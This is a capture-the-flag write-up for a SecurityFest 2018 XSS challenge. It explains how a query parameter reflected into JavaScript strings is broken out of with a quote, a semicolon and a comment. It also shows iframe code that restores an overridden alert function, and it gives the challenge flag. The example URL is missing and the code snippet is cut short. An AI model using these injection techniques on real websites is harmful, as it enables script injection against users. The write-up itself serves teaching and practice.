Tags: xss

Rating: 0

**Description**

> This is some kind of reverse captcha to tell if the visitor is indeed a robot. Can you complete it?
>
> Service: http://xss1.alieni.se:2999/

**No files given**

**Solution**

We are presented with a simple challenge:

![](https://raw.githubusercontent.com/Aurel300/empirectf/master/writeups/2018-05-31-SecurityFest/screens/excesss.png)

If we follow the ?xss=hello link, we can see this in the source code:

<script>var x ='hello'; var y = hello; var z = "hello";</script>

The xss parameter gets injected into three differently-quoted Javascript strings verbatim. We can use any one of them since our characters are not filtered. So, choosing the first one, we first inject a ' to escape the string, then a ; to allow us to run arbitrary code, and after our code, we put // to comment out the rest (to stop the browser from complaining about syntax errors).

URL:

But if we do this, we get a text prompt instead. There is another script included on the website, which overrides window.alert. Unfortunately, it seems window doesn't have a usable prototype, at least not in the current Chrome version. If we try delete window.alert;, the default alert function does not get restored.

Searching around for how to restore overridden functions, we find a simple technique: create an <iframe> and use its window's alert function.

var iframe = document.createElement("iframe");
document.documentElement.appendChild(iframe);
sctf{cr0ss_s1te_n0scr1ptinG}